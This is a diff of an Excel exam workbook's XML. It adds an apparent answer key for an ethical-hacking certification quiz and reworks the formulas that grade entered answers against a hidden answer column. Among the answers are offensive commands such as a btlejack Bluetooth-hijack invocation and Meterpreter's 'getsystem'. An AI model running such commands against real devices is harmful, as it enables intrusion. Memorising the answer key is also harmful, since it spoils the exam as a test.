--- a/Exam excel.xlsx
+++ b/Exam excel.xlsx
@@ -1,15 +1,16 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
-  <fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/>
-  <workbookPr defaultThemeVersion="153222"/>
+<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="26130"/>
+  <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\Cyber\Desktop\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\stratumhr\Downloads\"/>
     </mc:Choice>
   </mc:AlternateContent>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4A26BA3A-1DC5-4977-9770-743A646E11FF}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7755" activeTab="2"/>
+    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="1" sheetId="1" r:id="rId1"/>
@@ -17,7 +18,7 @@
     <sheet name="3" sheetId="4" r:id="rId3"/>
     <sheet name="4" sheetId="2" r:id="rId4"/>
   </sheets>
-  <calcPr calcId="152511"/>
+  <calcPr calcId="191029"/>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
       <x15:workbookPr chartTrackingRefBase="1"/>
@@ -27,7 +28,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="260" uniqueCount="246">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="495" uniqueCount="464">
   <si>
     <t>Slno</t>
   </si>
@@ -765,12 +766,666 @@
   </si>
   <si>
     <t>result</t>
+  </si>
+  <si>
+    <t>Use the 802.1x protocol</t>
+  </si>
+  <si>
+    <t>Place a front-end web server in a demilitarized zone that only handles external web traffic</t>
+  </si>
+  <si>
+    <t>ESP</t>
+  </si>
+  <si>
+    <t>Source IP address</t>
+  </si>
+  <si>
+    <t>Encrypting the JTAG interface</t>
+  </si>
+  <si>
+    <t>Grey-box</t>
+  </si>
+  <si>
+    <t>BBProxy</t>
+  </si>
+  <si>
+    <t>Salting</t>
+  </si>
+  <si>
+    <t>NIDS</t>
+  </si>
+  <si>
+    <t>Administrative safeguards</t>
+  </si>
+  <si>
+    <t>Private</t>
+  </si>
+  <si>
+    <t>Default Credential</t>
+  </si>
+  <si>
+    <t>Nothing because the password file does not contain the passwords themselves</t>
+  </si>
+  <si>
+    <t>Watering Hole</t>
+  </si>
+  <si>
+    <t>Rules of Engagement</t>
+  </si>
+  <si>
+    <t>IP Spoofing</t>
+  </si>
+  <si>
+    <t>Display of the contents of the passwd file</t>
+  </si>
+  <si>
+    <t>Spectre and Meltdown</t>
+  </si>
+  <si>
+    <t>C</t>
+  </si>
+  <si>
+    <t>Periodic security checks and audits are required. Access to network elements should be provided by user IDs with strong passwords</t>
+  </si>
+  <si>
+    <t>Open-source intelligence</t>
+  </si>
+  <si>
+    <t>Test password strength, brute-force encrypted or hashed passwords, and crack passwords via dictionary attacks</t>
+  </si>
+  <si>
+    <t>DNS spoofing</t>
+  </si>
+  <si>
+    <t>Trap</t>
+  </si>
+  <si>
+    <t>Nslookup</t>
+  </si>
+  <si>
+    <t>Sniffers operate on Layer 2 of the OSI model</t>
+  </si>
+  <si>
+    <t>Potential that a threat will exploit vulnerabilities of an asset or group of assets</t>
+  </si>
+  <si>
+    <t>host -t a resolveddomain.com</t>
+  </si>
+  <si>
+    <t>Windows</t>
+  </si>
+  <si>
+    <t>Confidentiality</t>
+  </si>
+  <si>
+    <t>Open mail relay</t>
+  </si>
+  <si>
+    <t>Port scanning, banner grabbing, service identification</t>
+  </si>
+  <si>
+    <t>Promiscuous mode</t>
+  </si>
+  <si>
+    <t>http-methods</t>
+  </si>
+  <si>
+    <t>Fuzz Testing</t>
+  </si>
+  <si>
+    <t>SYN</t>
+  </si>
+  <si>
+    <t>Determine the impact of enabling the audit feature</t>
+  </si>
+  <si>
+    <t>An authentication system that creates one-time passwords that are encrypted with secret keys</t>
+  </si>
+  <si>
+    <t>Brute force</t>
+  </si>
+  <si>
+    <t>Network layer</t>
+  </si>
+  <si>
+    <t>Crypter</t>
+  </si>
+  <si>
+    <t>Netbios enumeration</t>
+  </si>
+  <si>
+    <t>Markov Chain</t>
+  </si>
+  <si>
+    <t>Protocol analyzer</t>
+  </si>
+  <si>
+    <t>PKI</t>
+  </si>
+  <si>
+    <t>A web server facing the Internet, an application server on the internal network, a database server on the internal network</t>
+  </si>
+  <si>
+    <t>RSA is asymmetric, which is used to create a public/private key pair; AES is symmetric, which is used to encrypt data</t>
+  </si>
+  <si>
+    <t>tcptrace</t>
+  </si>
+  <si>
+    <t>T5</t>
+  </si>
+  <si>
+    <t>To defend against webserver attacks</t>
+  </si>
+  <si>
+    <t>NTP</t>
+  </si>
+  <si>
+    <t>tcp.port ==21</t>
+  </si>
+  <si>
+    <t>Encrypt the backup tapes and transport them in a lockbox</t>
+  </si>
+  <si>
+    <t>Results about all discounts from the site eccouncil.org except for the ilearn format</t>
+  </si>
+  <si>
+    <t>The tester only partially knows the internal structure</t>
+  </si>
+  <si>
+    <t>The data collection speeds, data processing speed, or enrolment time</t>
+  </si>
+  <si>
+    <t>An inability to access any website</t>
+  </si>
+  <si>
+    <t>Social Engineering</t>
+  </si>
+  <si>
+    <t>Chosen-plaintext</t>
+  </si>
+  <si>
+    <t>Not informing the employees that they are going to be monitored could be an invasion of privacy</t>
+  </si>
+  <si>
+    <t>Business Impact Analysis (BIA)</t>
+  </si>
+  <si>
+    <t>Gray Hat</t>
+  </si>
+  <si>
+    <t>Use the 3-2-1 backup rule</t>
+  </si>
+  <si>
+    <t>ESP transport mode</t>
+  </si>
+  <si>
+    <t>Demilitarized Zone</t>
+  </si>
+  <si>
+    <t>The host is likely a printer</t>
+  </si>
+  <si>
+    <t>Steganography</t>
+  </si>
+  <si>
+    <t>Wired Equivalent Privacy (WEP)</t>
+  </si>
+  <si>
+    <t>Through Web servers utilizing CGI to send a malformed environment variable</t>
+  </si>
+  <si>
+    <t>Single quotation</t>
+  </si>
+  <si>
+    <t>This is a scam as everybody can get a @gmail.com address, not the Gmail customer service employees</t>
+  </si>
+  <si>
+    <t>Bollards</t>
+  </si>
+  <si>
+    <t>Remote access policy</t>
+  </si>
+  <si>
+    <t>Split DNS</t>
+  </si>
+  <si>
+    <t>CA</t>
+  </si>
+  <si>
+    <t>If (source matches 10.10.10.0/24 and destination matches 10.20.20.1 and port matches 443) then permit</t>
+  </si>
+  <si>
+    <t>Confidentiality, integrity, and availability</t>
+  </si>
+  <si>
+    <t>Automatic and manual testing should be used together to better cover potential problems</t>
+  </si>
+  <si>
+    <t>Public Key</t>
+  </si>
+  <si>
+    <t>Use hping</t>
+  </si>
+  <si>
+    <t>Creating a botnet</t>
+  </si>
+  <si>
+    <t>STARTTLS</t>
+  </si>
+  <si>
+    <t>Doxing</t>
+  </si>
+  <si>
+    <t>IPsec driver</t>
+  </si>
+  <si>
+    <t>Use a scan tool like Nessus</t>
+  </si>
+  <si>
+    <t>Rainbow table</t>
+  </si>
+  <si>
+    <t>Corporate Espionage</t>
+  </si>
+  <si>
+    <t>tcp.dstport==514 &amp;&amp; ip.dst==192.168.0.151</t>
+  </si>
+  <si>
+    <t>This is the process of sniffing through the hub</t>
+  </si>
+  <si>
+    <t>Hypervisor (Virtualized) Rootkits</t>
+  </si>
+  <si>
+    <t>Unicode characters</t>
+  </si>
+  <si>
+    <t>Use Tor network with multi-node</t>
+  </si>
+  <si>
+    <t>Use password salting</t>
+  </si>
+  <si>
+    <t>It sends a request packet to all the network elements, asking for the MAC address from a specific IP</t>
+  </si>
+  <si>
+    <t>Banner grabbing</t>
+  </si>
+  <si>
+    <t>Height/Weight</t>
+  </si>
+  <si>
+    <t>Dictionary-attack</t>
+  </si>
+  <si>
+    <t>SSL/TLS uses both asymmetric and symmetric encryption</t>
+  </si>
+  <si>
+    <t>CHNTPW</t>
+  </si>
+  <si>
+    <t>Ettercap</t>
+  </si>
+  <si>
+    <t>XSS</t>
+  </si>
+  <si>
+    <t>Reconnaissance</t>
+  </si>
+  <si>
+    <t>Evil Twin</t>
+  </si>
+  <si>
+    <t>Attempts by attackers to access websites that trust the Web browser user by stealing the employee's authentication credentials</t>
+  </si>
+  <si>
+    <t>Threat</t>
+  </si>
+  <si>
+    <t>Media Access Control (MAC)</t>
+  </si>
+  <si>
+    <t>Rainbow Table Attack</t>
+  </si>
+  <si>
+    <t>TCP SYN (Stealth) Scan</t>
+  </si>
+  <si>
+    <t>Trojan</t>
+  </si>
+  <si>
+    <t>Integrity</t>
+  </si>
+  <si>
+    <t>He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer</t>
+  </si>
+  <si>
+    <t>False Positives and False Negatives</t>
+  </si>
+  <si>
+    <t>Single sign-on</t>
+  </si>
+  <si>
+    <t>Global deduction</t>
+  </si>
+  <si>
+    <t>Zero-Day</t>
+  </si>
+  <si>
+    <t>Macro virus</t>
+  </si>
+  <si>
+    <t>URG, PUSH and FIN are set</t>
+  </si>
+  <si>
+    <t>USBDumper</t>
+  </si>
+  <si>
+    <t>CAST-128</t>
+  </si>
+  <si>
+    <t>Key stretching</t>
+  </si>
+  <si>
+    <t>He can use two internal commands VRFY and EXPN, which provide information about valid users, email addresses, etc</t>
+  </si>
+  <si>
+    <t>Identify assets and create a baseline -&gt; Vulnerability scan -&gt; Risk assessment -&gt; Remediation -&gt; Verification -&gt; Monitor</t>
+  </si>
+  <si>
+    <t>Trident</t>
+  </si>
+  <si>
+    <t>Dictionary attack</t>
+  </si>
+  <si>
+    <t>GPG</t>
+  </si>
+  <si>
+    <t>Spearphone attack</t>
+  </si>
+  <si>
+    <t>. (Period)</t>
+  </si>
+  <si>
+    <t>Hootsuite</t>
+  </si>
+  <si>
+    <t>sV</t>
+  </si>
+  <si>
+    <t>filetype:</t>
+  </si>
+  <si>
+    <t>sA</t>
+  </si>
+  <si>
+    <t>Passive assessment</t>
+  </si>
+  <si>
+    <t>Netsparker</t>
+  </si>
+  <si>
+    <t>Cloudborne attack</t>
+  </si>
+  <si>
+    <t>https://www.guardster.com</t>
+  </si>
+  <si>
+    <t>Wardriving</t>
+  </si>
+  <si>
+    <t>Key escrow</t>
+  </si>
+  <si>
+    <t>Server-side includes injection</t>
+  </si>
+  <si>
+    <t>Angela's public key.</t>
+  </si>
+  <si>
+    <t>A pop-up appears to a user stating, "Your computer may have been infected with spyware. Click here to install an anti-spyware tool to resolve this issue."</t>
+  </si>
+  <si>
+    <t>WS-Security</t>
+  </si>
+  <si>
+    <t>PP</t>
+  </si>
+  <si>
+    <t>MAC flooding</t>
+  </si>
+  <si>
+    <t>RIPE NCC</t>
+  </si>
+  <si>
+    <t>Performing content enumeration using a wordlist</t>
+  </si>
+  <si>
+    <t>Burp Suite</t>
+  </si>
+  <si>
+    <t>Using wget to perform banner grabbing on the webserver</t>
+  </si>
+  <si>
+    <t>Union SQL injection</t>
+  </si>
+  <si>
+    <t>Evilginx</t>
+  </si>
+  <si>
+    <t>Unspecified proxy activities</t>
+  </si>
+  <si>
+    <t>Delivery</t>
+  </si>
+  <si>
+    <t>SNMP and he should change it to SNMP V3</t>
+  </si>
+  <si>
+    <t>Credential enumerator</t>
+  </si>
+  <si>
+    <t>WS-Address spoofing</t>
+  </si>
+  <si>
+    <t>Power/clock/reset glitching</t>
+  </si>
+  <si>
+    <t>[related:]</t>
+  </si>
+  <si>
+    <t>Linux OS</t>
+  </si>
+  <si>
+    <t>During a cyberattack, a hacker corrupts the event logs on all machines</t>
+  </si>
+  <si>
+    <t>Censys</t>
+  </si>
+  <si>
+    <t>Technical threat intelligence</t>
+  </si>
+  <si>
+    <t>No ABAC validation</t>
+  </si>
+  <si>
+    <t>Serpent</t>
+  </si>
+  <si>
+    <t>.stm</t>
+  </si>
+  <si>
+    <t>Lack of Authorization/Authentication and Insecure Defaults</t>
+  </si>
+  <si>
+    <t>Buffer Overflow</t>
+  </si>
+  <si>
+    <t>Internal monologue attack</t>
+  </si>
+  <si>
+    <t>Spear-phishing attack</t>
+  </si>
+  <si>
+    <t>Kube-scheduler</t>
+  </si>
+  <si>
+    <t>Spoofed session flood attack</t>
+  </si>
+  <si>
+    <t>Web of trust</t>
+  </si>
+  <si>
+    <t>DNS cache snooping</t>
+  </si>
+  <si>
+    <t>Downgrade security attack</t>
+  </si>
+  <si>
+    <t>Watering hole</t>
+  </si>
+  <si>
+    <t>Whitelist validation</t>
+  </si>
+  <si>
+    <t>File Transfer Protocol</t>
+  </si>
+  <si>
+    <t>getsystem</t>
+  </si>
+  <si>
+    <t>BetterCAP</t>
+  </si>
+  <si>
+    <t>Detecting the presence of Honeyd honeypots</t>
+  </si>
+  <si>
+    <t>Weak password recovery mechanism</t>
+  </si>
+  <si>
+    <t>CeWL</t>
+  </si>
+  <si>
+    <t>Gray hat</t>
+  </si>
+  <si>
+    <t>She should check her ARP table and see if there is one IP address with two different MAC addresses</t>
+  </si>
+  <si>
+    <t>btlejack -f 0x9c68fd30 -t -m 0x1fffffffff</t>
+  </si>
+  <si>
+    <t>Syhunt Hybrid</t>
+  </si>
+  <si>
+    <t>Log4J</t>
+  </si>
+  <si>
+    <t>Operational threat intelligence</t>
+  </si>
+  <si>
+    <t>Docker</t>
+  </si>
+  <si>
+    <t>D</t>
+  </si>
+  <si>
+    <t>Incident triage</t>
+  </si>
+  <si>
+    <t>VPN</t>
+  </si>
+  <si>
+    <t>Enumerating the databases in the DBMS for the URL</t>
+  </si>
+  <si>
+    <t>Reverse engineering</t>
+  </si>
+  <si>
+    <t>Scanning networks</t>
+  </si>
+  <si>
+    <t>Worm</t>
+  </si>
+  <si>
+    <t>XXE</t>
+  </si>
+  <si>
+    <t>Reverse image search</t>
+  </si>
+  <si>
+    <t>Advanced SMS phishing</t>
+  </si>
+  <si>
+    <t>IaaS</t>
+  </si>
+  <si>
+    <t>Netcat</t>
+  </si>
+  <si>
+    <t>IoTSeeker</t>
+  </si>
+  <si>
+    <t>Lock-in</t>
+  </si>
+  <si>
+    <t>PCI-DSS</t>
+  </si>
+  <si>
+    <t>T</t>
+  </si>
+  <si>
+    <t>Kernel-level rootkit</t>
+  </si>
+  <si>
+    <t>External assessment</t>
+  </si>
+  <si>
+    <t>Evil-twin attack</t>
+  </si>
+  <si>
+    <t>Yagi antenna</t>
+  </si>
+  <si>
+    <t>wash</t>
+  </si>
+  <si>
+    <t>Zero trust network</t>
+  </si>
+  <si>
+    <t>OSINT framework</t>
+  </si>
+  <si>
+    <t>Marks</t>
+  </si>
+  <si>
+    <t>percentage</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Result </t>
+  </si>
+  <si>
+    <t>TOTAL Mark</t>
+  </si>
+  <si>
+    <t>Percentage</t>
+  </si>
+  <si>
+    <t>Total Mark</t>
+  </si>
+  <si>
+    <t>Percent</t>
+  </si>
+  <si>
+    <t>percent</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
   <fonts count="2" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
@@ -809,7 +1464,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="6">
+  <cellXfs count="5">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center"/>
@@ -821,7 +1476,6 @@
       <alignment horizontal="center"/>
     </xf>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1"/>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -1101,11 +1755,11 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A1:D126"/>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
+  <dimension ref="A1:G131"/>
   <sheetViews>
-    <sheetView workbookViewId="0">
-      <selection activeCell="D1" sqref="D1:D1048576"/>
+    <sheetView tabSelected="1" topLeftCell="A121" workbookViewId="0">
+      <selection activeCell="F138" sqref="F138"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -1113,7 +1767,8 @@
     <col min="1" max="1" width="9.140625" style="1"/>
     <col min="2" max="2" width="25" hidden="1" customWidth="1"/>
     <col min="3" max="3" width="18.42578125" customWidth="1"/>
-    <col min="4" max="4" width="0" hidden="1" customWidth="1"/>
+    <col min="4" max="4" width="11.42578125" hidden="1" customWidth="1"/>
+    <col min="6" max="6" width="11.42578125" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="1" spans="1:4" ht="18.75" x14ac:dyDescent="0.3">
@@ -1158,7 +1813,7 @@
       <c r="A4" s="1">
         <v>3</v>
       </c>
-      <c r="B4" s="5" t="s">
+      <c r="B4" t="s">
         <v>5</v>
       </c>
       <c r="D4" t="b">
@@ -1278,7 +1933,7 @@
       <c r="A14" s="1">
         <v>13</v>
       </c>
-      <c r="B14" s="5" t="s">
+      <c r="B14" t="s">
         <v>15</v>
       </c>
       <c r="D14" t="b">
@@ -1422,7 +2077,7 @@
       <c r="A26" s="1">
         <v>25</v>
       </c>
-      <c r="B26" s="5" t="s">
+      <c r="B26" t="s">
         <v>27</v>
       </c>
       <c r="D26" t="b">
@@ -1446,7 +2101,7 @@
       <c r="A28" s="1">
         <v>27</v>
       </c>
-      <c r="B28" s="5" t="s">
+      <c r="B28" t="s">
         <v>29</v>
       </c>
       <c r="D28" t="b">
@@ -1462,7 +2117,7 @@
         <v>30</v>
       </c>
       <c r="D29" t="b">
-        <f>IF(B30=C29,TRUE,FALSE)</f>
+        <f t="shared" si="0"/>
         <v>0</v>
       </c>
     </row>
@@ -1474,7 +2129,7 @@
         <v>31</v>
       </c>
       <c r="D30" t="b">
-        <f>IF(B31=C30,TRUE,FALSE)</f>
+        <f t="shared" si="0"/>
         <v>0</v>
       </c>
     </row>
@@ -1486,7 +2141,7 @@
         <v>32</v>
       </c>
       <c r="D31" t="b">
-        <f>IF(B32=C31,TRUE,FALSE)</f>
+        <f t="shared" si="0"/>
         <v>0</v>
       </c>
     </row>
@@ -1538,11 +2193,11 @@
         <v>0</v>
       </c>
     </row>
-    <row r="36" spans="1:4" ht="45" x14ac:dyDescent="0.25">
+    <row r="36" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A36" s="1">
         <v>35</v>
       </c>
-      <c r="B36" s="2" t="s">
+      <c r="B36" t="s">
         <v>37</v>
       </c>
       <c r="D36" t="b">
@@ -1602,7 +2257,7 @@
       <c r="A41" s="1">
         <v>40</v>
       </c>
-      <c r="B41" s="5" t="s">
+      <c r="B41" t="s">
         <v>42</v>
       </c>
       <c r="D41" t="b">
@@ -1610,11 +2265,11 @@
         <v>0</v>
       </c>
     </row>
-    <row r="42" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+    <row r="42" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A42" s="1">
         <v>41</v>
       </c>
-      <c r="B42" s="2" t="s">
+      <c r="B42" t="s">
         <v>43</v>
       </c>
       <c r="D42" t="b">
@@ -1710,7 +2365,7 @@
       <c r="A50" s="1">
         <v>49</v>
       </c>
-      <c r="B50" s="5" t="s">
+      <c r="B50" t="s">
         <v>51</v>
       </c>
       <c r="D50" t="b">
@@ -1866,7 +2521,7 @@
       <c r="A63" s="1">
         <v>62</v>
       </c>
-      <c r="B63" s="5" t="s">
+      <c r="B63" t="s">
         <v>64</v>
       </c>
       <c r="D63" t="b">
@@ -1914,11 +2569,11 @@
       <c r="A67" s="1">
         <v>66</v>
       </c>
-      <c r="B67" s="5" t="s">
+      <c r="B67" t="s">
         <v>68</v>
       </c>
       <c r="D67" t="b">
-        <f t="shared" ref="D67:D119" si="1">IF(B67=C67,TRUE,FALSE)</f>
+        <f t="shared" ref="D67:D126" si="1">IF(B67=C67,TRUE,FALSE)</f>
         <v>0</v>
       </c>
     </row>
@@ -2046,7 +2701,7 @@
       <c r="A78" s="1">
         <v>77</v>
       </c>
-      <c r="B78" s="5" t="s">
+      <c r="B78" t="s">
         <v>78</v>
       </c>
       <c r="D78" t="b">
@@ -2166,7 +2821,7 @@
       <c r="A88" s="1">
         <v>87</v>
       </c>
-      <c r="B88" s="5" t="s">
+      <c r="B88" t="s">
         <v>88</v>
       </c>
       <c r="D88" t="b">
@@ -2202,7 +2857,7 @@
       <c r="A91" s="1">
         <v>90</v>
       </c>
-      <c r="B91" s="5" t="s">
+      <c r="B91" t="s">
         <v>91</v>
       </c>
       <c r="D91" t="b">
@@ -2214,7 +2869,7 @@
       <c r="A92" s="1">
         <v>91</v>
       </c>
-      <c r="B92" s="5" t="s">
+      <c r="B92" t="s">
         <v>92</v>
       </c>
       <c r="D92" t="b">
@@ -2238,7 +2893,7 @@
       <c r="A94" s="1">
         <v>93</v>
       </c>
-      <c r="B94" s="5" t="s">
+      <c r="B94" t="s">
         <v>94</v>
       </c>
       <c r="D94" t="b">
@@ -2250,7 +2905,7 @@
       <c r="A95" s="1">
         <v>94</v>
       </c>
-      <c r="B95" s="5" t="s">
+      <c r="B95" t="s">
         <v>95</v>
       </c>
       <c r="D95" t="b">
@@ -2262,7 +2917,7 @@
       <c r="A96" s="1">
         <v>95</v>
       </c>
-      <c r="B96" s="5" t="s">
+      <c r="B96" t="s">
         <v>96</v>
       </c>
       <c r="D96" t="b">
@@ -2322,7 +2977,7 @@
       <c r="A101" s="1">
         <v>100</v>
       </c>
-      <c r="B101" s="5" t="s">
+      <c r="B101" t="s">
         <v>101</v>
       </c>
       <c r="D101" t="b">
@@ -2346,7 +3001,7 @@
       <c r="A103" s="1">
         <v>102</v>
       </c>
-      <c r="B103" s="5" t="s">
+      <c r="B103" t="s">
         <v>103</v>
       </c>
       <c r="D103" t="b">
@@ -2382,7 +3037,7 @@
       <c r="A106" s="1">
         <v>105</v>
       </c>
-      <c r="B106" s="5" t="s">
+      <c r="B106" t="s">
         <v>106</v>
       </c>
       <c r="D106" t="b">
@@ -2394,7 +3049,7 @@
       <c r="A107" s="1">
         <v>106</v>
       </c>
-      <c r="B107" s="5" t="s">
+      <c r="B107" t="s">
         <v>107</v>
       </c>
       <c r="D107" t="b">
@@ -2462,11 +3117,11 @@
         <v>0</v>
       </c>
     </row>
-    <row r="113" spans="1:4" x14ac:dyDescent="0.25">
+    <row r="113" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A113" s="1">
         <v>112</v>
       </c>
-      <c r="B113" s="5" t="s">
+      <c r="B113" t="s">
         <v>112</v>
       </c>
       <c r="D113" t="b">
@@ -2474,7 +3129,7 @@
         <v>0</v>
       </c>
     </row>
-    <row r="114" spans="1:4" x14ac:dyDescent="0.25">
+    <row r="114" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A114" s="1">
         <v>113</v>
       </c>
@@ -2486,7 +3141,7 @@
         <v>0</v>
       </c>
     </row>
-    <row r="115" spans="1:4" x14ac:dyDescent="0.25">
+    <row r="115" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A115" s="1">
         <v>114</v>
       </c>
@@ -2498,7 +3153,7 @@
         <v>0</v>
       </c>
     </row>
-    <row r="116" spans="1:4" x14ac:dyDescent="0.25">
+    <row r="116" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A116" s="1">
         <v>115</v>
       </c>
@@ -2510,7 +3165,7 @@
         <v>0</v>
       </c>
     </row>
-    <row r="117" spans="1:4" x14ac:dyDescent="0.25">
+    <row r="117" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A117" s="1">
         <v>116</v>
       </c>
@@ -2522,11 +3177,11 @@
         <v>0</v>
       </c>
     </row>
-    <row r="118" spans="1:4" x14ac:dyDescent="0.25">
+    <row r="118" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A118" s="1">
         <v>117</v>
       </c>
-      <c r="B118" s="5" t="s">
+      <c r="B118" t="s">
         <v>117</v>
       </c>
       <c r="D118" t="b">
@@ -2534,11 +3189,11 @@
         <v>0</v>
       </c>
     </row>
-    <row r="119" spans="1:4" x14ac:dyDescent="0.25">
+    <row r="119" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A119" s="1">
         <v>118</v>
       </c>
-      <c r="B119" s="5" t="s">
+      <c r="B119" t="s">
         <v>118</v>
       </c>
       <c r="D119" t="b">
@@ -2546,7 +3201,7 @@
         <v>0</v>
       </c>
     </row>
-    <row r="120" spans="1:4" x14ac:dyDescent="0.25">
+    <row r="120" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A120" s="1">
         <v>119</v>
       </c>
@@ -2554,11 +3209,11 @@
         <v>124</v>
       </c>
       <c r="D120" t="b">
-        <f t="shared" ref="D120:D125" si="2">IF(B121=C120,TRUE,FALSE)</f>
-        <v>0</v>
-      </c>
-    </row>
-    <row r="121" spans="1:4" x14ac:dyDescent="0.25">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="121" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A121" s="1">
         <v>120</v>
       </c>
@@ -2566,23 +3221,23 @@
         <v>123</v>
       </c>
       <c r="D121" t="b">
-        <f t="shared" si="2"/>
-        <v>0</v>
-      </c>
-    </row>
-    <row r="122" spans="1:4" x14ac:dyDescent="0.25">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="122" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A122" s="1">
         <v>121</v>
       </c>
-      <c r="B122" s="5" t="s">
+      <c r="B122" t="s">
         <v>119</v>
       </c>
       <c r="D122" t="b">
-        <f t="shared" si="2"/>
-        <v>0</v>
-      </c>
-    </row>
-    <row r="123" spans="1:4" x14ac:dyDescent="0.25">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="123" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A123" s="1">
         <v>122</v>
       </c>
@@ -2590,23 +3245,23 @@
         <v>120</v>
       </c>
       <c r="D123" t="b">
-        <f t="shared" si="2"/>
-        <v>0</v>
-      </c>
-    </row>
-    <row r="124" spans="1:4" x14ac:dyDescent="0.25">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
